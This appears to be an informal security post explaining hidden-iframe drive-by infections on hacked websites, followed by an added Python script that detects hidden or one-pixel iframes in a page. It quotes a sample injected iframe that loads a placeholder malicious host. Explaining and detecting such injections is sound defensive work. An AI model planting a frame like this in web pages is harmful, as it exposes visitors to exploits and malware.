[Description]
You can find it almost anywhere, it is small and can hardly be seen :)
You can encounter it even on websites that are supposed to be clean because malicious people are using all kinds of exploits for known platforms in order to successfully append a small piece of code to a certain web page.
In order to understand it better, let me show you how it appears:
<iframe src='http://IP/path/index.php' width='1' height='1' style='visibility: hidden'></iframe>
(other variants are the same; there are different attributes, sources, etc., but they have the same behaviour)
As you can see, it isn't something extraordinary, just one line of code... but let's see what it does.
First it will create an invisible frame that points to a certain website. Usually that website is a fake one or a real one that was hacked.
Now, the content received from that IP is malicious. It can be an exploit, for example a specially crafted image that triggers a buffer overflow when it is rendered, so that arbitrary code is executed. This has the potential to take over the entire machine and add it to a very large botnet.
A botnet is a network of zombie computers whose purpose is to serve a malicious person. They can send spam, attack other computers causing a Denial of Service, etc.
It can also install a keylogger in order to gather passwords, credit card numbers and other confidential information.
Their primary purpose is to make money, so they will continue to do this and a lot more in order to ensure that.
Now, as you can see, with just one line of code someone can have access to your entire system. It can even monitor your activity right now...
[Clean]
What can you do to prevent this? Hmm... not much. If you are a regular user who doesn't want to do complicated things, then you can just have an antivirus installed and keep your computer updated.
If you are a person who cares very much about security, then you can add a few more layers of protection; for example, you can use a virtual machine (VMware, VirtualPC, etc.) to browse the internet.
But usually if you have a good antivirus installed and updated, then you can say that you are protected, but don't navigate on malicious websites :)
Still, if the antivirus warns you about it, then usually all you have to do is to delete the infected file (this can be achieved by deleting the temporary internet files, or the cache, it depends on your browser).
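A site owner can also check their own pages for the kind of frame shown in the description. The following is an added example, not part of the original post: it uses Python's standard html.parser to flag iframes that are hidden by style or only 0 to 1 pixels in size. The sample page and the video.example host are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Inline style declarations that hide an element from view.
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
# Width/height of 0 or 1 pixel given as an attribute value ("1", "1px") ...
TINY_ATTR = re.compile(r"^\s*[01](?:px)?\s*$", re.I)
# ... or inside a style attribute ("width:1px").
TINY_STYLE = re.compile(r"(?:^|;)\s*(?:width|height)\s*:\s*[01](?:px)?\s*(?:;|$)", re.I)

class HiddenIframeFinder(HTMLParser):
    """Collects <iframe> tags that are invisible or only 0-1 pixels large."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (line number, src, list of reasons)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        style = a.get("style", "")
        reasons = []
        if HIDDEN_STYLE.search(style):
            reasons.append("hidden by style")
        if TINY_STYLE.search(style):
            reasons.append("tiny size in style")
        for dim in ("width", "height"):
            if dim in a and TINY_ATTR.match(a[dim]):
                reasons.append(f"{dim}={a[dim].strip()}")
        if reasons:
            self.findings.append((self.getpos()[0], a.get("src", ""), reasons))

def find_hidden_iframes(html):
    """Return a list of (line, src, reasons) for every suspicious iframe."""
    finder = HiddenIframeFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page: one normal frame and one like the example above.
SAMPLE = """<html><body>
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
<p>Welcome to my site</p>
<iframe src='http://IP/path/index.php' width='1' height='1' style='visibility: hidden'></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, src, reasons in find_hidden_iframes(SAMPLE):
        print(f"line {line}: {src} ({', '.join(reasons)})")
```

A hit is only a reason to look closer: some legitimate widgets also use tiny or hidden frames, so compare the src against the sources you actually placed on the page.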